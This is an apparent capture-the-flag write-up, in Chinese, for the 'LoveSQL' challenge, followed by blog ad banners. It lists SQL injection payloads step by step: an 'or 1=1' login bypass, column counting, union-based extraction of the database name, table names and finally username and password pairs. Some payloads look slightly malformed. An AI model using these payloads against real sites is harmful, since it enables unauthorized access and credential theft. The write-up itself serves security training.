[极客大挑战 2019]LoveSQL
[极客大挑战 2019]LoveSQL-------wp from Kuller_yan
先打开靶场 看看题目
一看就和上一题 easysql 尝试万能钥匙1' or 1=1 #
看起来像md5解密,但是解密失败,继续查询字段,admin' order by 3 #
admin' order by 4 #
到4的时候没有正常返回,然后用1' union select 1,2,3 #
回显点为2,3;然后用1' union select 1,database(), version() #
可以看到库名为geek
;然后查找表1' union select 1,2 table_name from information_schema.tables where table_schema=database() limit 0,1 #
更换limit的值,1' union select 1,2 table_name from information_schema.tables where table_schema=database() limit 1,2 #
可以看到有两个表名geekuser
l0ve1ysq1
,然后尝试爆破l0ve1ysq1
的列名
然后查看列名里面的username,password;命令:1' union select 1,2 group_concat(concat_ws(0x7e,username,password)) from geek.l0ve1ysq1 #
找到flag;
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步